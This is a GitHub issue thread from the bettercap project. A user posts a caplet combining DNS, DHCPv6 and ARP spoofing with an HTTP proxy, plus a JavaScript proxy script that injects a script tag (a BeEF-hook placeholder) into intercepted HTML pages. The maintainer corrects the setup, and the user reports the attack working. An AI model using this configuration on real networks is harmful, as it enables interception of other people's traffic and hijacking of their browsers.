search

bettercap / bettercap

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.
https://www.bettercap.org/
Other
16.28k stars 1.45k forks source link

Bettercap + dns spoofer + injectjs #469

Closed pokevas closed 5 years ago

pokevas commented 5 years ago

Caplet code:

set dns.spoof.domains example.com
set dhcp6.spoof.domains example.com

dhcp6.spoof on
dns.spoof on

set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}ยป {reset}

# inject beef hook
set http.proxy.script beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

beef-inject.js code:

function onLoad() {
    log( "BeefInject loaded." );
    log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript">alert(12345);</script></head>' 
            ); 
        }
    }
}

Note: I try intercept only http sites, without https.

I setup DNS on Windows 10 machine in Network Adapter. When try to open http://example.com (oh, do you know, that this site exist and working?) i saw this error: screenshot_4

In bettercap terminal i saw: screenshot_3

But website not load. Where problem? I want user Fake DNS Server (built in bettercap) to forward to proxy module (same machine and ip address) and inject .js code. When i try to connect bettercap proxy server without DNS server - all okay. But when from DNS request - not load :(

Where problem in config or maybe in server?

Thanks.

evilsocket commented 5 years ago

It seems to be working correctly, it's just that there's no http server serving anything on port 80 for example.com, so you get an ERR_CONNECTION_REFUSED ... once you use dns.spoof, you also need to serve something from your IP.

Moreover, since you'll need to serve files yourself given you're hijacking DNS records, what's the point of using http.proxy to inject beef?

You might just want to try a simpler combination of arp.spoof and http.proxy as dns.spoof doesn't seem to be required in this case ...

pokevas commented 5 years ago

Perhaps you misunderstood me. I dont need to replace the site content, I need to add JS code to the content on the fly. Why won't dns.spoof be needed if I want to do this: Client connect to my DNS server (i set Fake DNS in Network Adapters settings), bettercap dns fake server return ip address oneself, when user try to reach site content by ip address of bettercap server, bettercap inject js code to content and return user modified content. For this i need spoof dns + bettercap proxy with js injection. or I'm wrong?

evilsocket commented 5 years ago

yes you are wrong, on several levels:

  1. if you use both arp.spoof and dns.spoof. you don't need to set the DNS server in the settings ... the fact you do makes me think you don't understand how spoofing works.
  2. if there's nothing on 10.0.0.6:80, you can't really expect the page to load.
  3. again, you don't need dns.spoof for what you're trying to achieve, just arp.spoof and http.proxy
pokevas commented 5 years ago

Thanks. Indeed, I was wrong on some basic concepts. Removed dns spoofing and set up extra moments and it all worked.